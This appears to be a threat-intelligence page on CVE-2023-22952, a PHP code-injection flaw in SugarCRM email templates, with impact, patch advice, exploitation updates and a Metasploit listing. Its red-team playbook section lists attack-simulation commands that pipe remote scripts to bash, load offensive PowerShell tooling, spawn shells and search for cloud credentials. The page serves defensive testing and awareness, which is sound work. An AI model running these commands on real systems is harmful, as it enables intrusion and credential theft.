CVE-2023-22952
Overview
This vulnerability is a code injection flaw rooted in insufficient input validation within the EmailTemplates component of SugarCRM. Specifically, crafted requests can inject arbitrary PHP code due to the lack of sanitization in parameters processed by the EmailTemplates feature. The flaw affects SugarCRM versions prior to 12.0 Hotfix 91155, allowing manipulation of server-side code execution pathways.
Vulnerability Description
In SugarCRM before 12.0. Hotfix 91155, a crafted request can inject custom PHP code through the EmailTemplates because of missing input validation.
Impact
An attacker with low-privileged authenticated access can inject and execute arbitrary PHP code on the SugarCRM server. This leads to full compromise of the application environment, including unauthorized access to sensitive customer relationship data and business intelligence. Such control enables command execution, data theft, and potential lateral movement within the affected network, posing severe operational and confidentiality risks.
Solution
Apply SugarCRM Hotfix 91155 or upgrade to version 12.0 or later as detailed in the official advisory at https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/. The vendor’s patch addresses the input validation flaw in the EmailTemplates component. Follow the vendor’s instructions for patch deployment to ensure complete remediation of the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in SugarCRM arises from inadequate input validation in the EmailTemplates feature, allowing an attacker to inject custom PHP code through crafted requests. This flaw occurs due to the application's failure to properly sanitize user inputs, which can lead to arbitrary code execution. When an attacker successfully exploits this vulnerability, they can execute malicious PHP scripts on the server, potentially gaining unauthorized access to sensitive data, altering application behavior, or even taking full control of the affected system. The severity of this vulnerability is underscored by its high CVSS score of 8.8, indicating a critical risk that organizations must address promptly.
Attack vectors for this vulnerability are diverse, primarily involving the manipulation of requests sent to the SugarCRM application. An attacker could leverage social engineering tactics to trick users into executing malicious requests or directly target the application through automated scripts. For instance, an attacker might craft a request that includes PHP code within the EmailTemplates, which, when processed by the server, executes the injected code. This exploitation could occur in various scenarios, such as during the creation or modification of email templates, where the application fails to validate or sanitize the input adequately. The potential for exploitation is significant, especially in environments where SugarCRM is integrated with other systems or where it handles sensitive customer data.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on SugarCRM for customer relationship management. Successful exploitation could lead to data breaches, loss of customer trust, and significant financial repercussions. For instance, if an attacker gains access to customer information or internal communications, they could misuse this data for identity theft, fraud, or corporate espionage. Additionally, the reputational damage resulting from a security breach can have long-lasting effects on a business, leading to decreased customer loyalty and potential legal liabilities. Organizations that fail to address this vulnerability may also face compliance issues, especially if they are subject to regulations that mandate the protection of customer data.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted security strategy. Regularly updating SugarCRM to the latest version is crucial, as updates often include patches for known vulnerabilities. Additionally, organizations should conduct thorough security assessments and penetration testing to identify potential weaknesses in their systems. Implementing web application firewalls (WAFs) can help filter out malicious requests before they reach the application, providing an additional layer of protection. Furthermore, employing strict input validation and sanitization practices within the application can significantly reduce the risk of code injection attacks. Educating employees about the risks associated with social engineering and the importance of security best practices can also enhance the overall security posture of the organization.
In conclusion, the vulnerability in SugarCRM presents a critical risk that can lead to severe consequences for affected organizations. The potential for arbitrary code execution through crafted requests highlights the importance of robust input validation and security measures. By understanding the technical details, recognizing the attack vectors, assessing the real-world impact, and implementing effective detection and mitigation strategies, organizations can better protect themselves against this and similar vulnerabilities. Proactive security management is essential in today's threat landscape, where the consequences of inaction can be devastating.
CSURFACE threat intelligence has identified a notable surge in exploitation attempts targeting CVE-2023-22952, reflecting increased adversary interest and activity. Our telemetry indicates that threat actors are actively leveraging the vulnerability’s unauthenticated remote code execution vector, particularly exploiting the EmailTemplates module’s deficient input validation to deploy malicious payloads. This uptick in exploitation attempts underscores the vulnerability’s attractiveness for attackers seeking persistent footholds within compromised SugarCRM environments. Although the EPSS score remains high and stable, the observed escalation in real-world exploitation elevates the operational risk for organizations running affected SugarCRM versions, especially those lacking timely patching or compensating controls. The persistence of unauthenticated access combined with the ability to execute arbitrary PHP code continues to present a critical threat, amplifying the potential for lateral movement, data exfiltration, or further system compromise. Defenders should consider this increased activity as a signal of heightened threat actor focus, warranting enhanced monitoring and incident response readiness.
Update 2 — July 31, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-22952, with telemetry indicating a doubling in observed activity over recent monitoring periods. This surge reflects increased attacker interest and operational tempo, likely driven by the availability of a mature Metasploit module that lowers the barrier for exploitation. The persistence of unauthenticated remote code execution combined with the ease of weaponizing the vulnerability underscores a growing risk to organizations running vulnerable SugarCRM versions without applied patches or mitigations. Although the EPSS score remains stable, the sharp rise in real-world exploitation attempts elevates the threat level from high to critical in practical terms, as adversaries can leverage this flaw for initial access, lateral movement, and potential data compromise. Defenders should interpret this trend as an indicator of heightened adversary focus and increased likelihood of targeted attacks exploiting this vector.
Update 3 — August 17, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2023-22952, reflected by a discernible uptick in detection activity across multiple environments. This increase signals growing adversary interest and operationalization of the vulnerability, likely facilitated by the availability of a Metasploit module that lowers the barrier for exploitation. The persistence of unauthenticated remote code execution capabilities continues to present a critical risk, as attackers can leverage this flaw to establish initial footholds and potentially escalate privileges within compromised networks. Although the EPSS score remains stable, the qualitative rise in exploitation attempts underscores an elevated threat posture that demands heightened vigilance. This evolving landscape suggests that threat actors are increasingly incorporating this vulnerability into their attack chains, thereby amplifying the risk of widespread impact for organizations running unpatched SugarCRM instances.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sugarcrm | Sugarcrm | All |
cpe:2.3:a:sugarcrm:sugarcrm:*:*:*:*:*:*:*:*
|
|
|
Sugarcrm | Sugarcrm | All |
cpe:2.3:a:sugarcrm:sugarcrm:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
SugarCRM unauthenticated Remote Code Execution (RCE)
exploits/multi/http/sugarcrm_webshell_cve_2023_22952
|
Sw33t.0day | Unknown | - | View |
Threat Feed
12 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-22952 |
| support.sugarcrm.com |
GitHub CVE
|
https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/ |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/171320/SugarCRM-12.x-Remote-Code-Execution-Shell-Upload.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-22952 |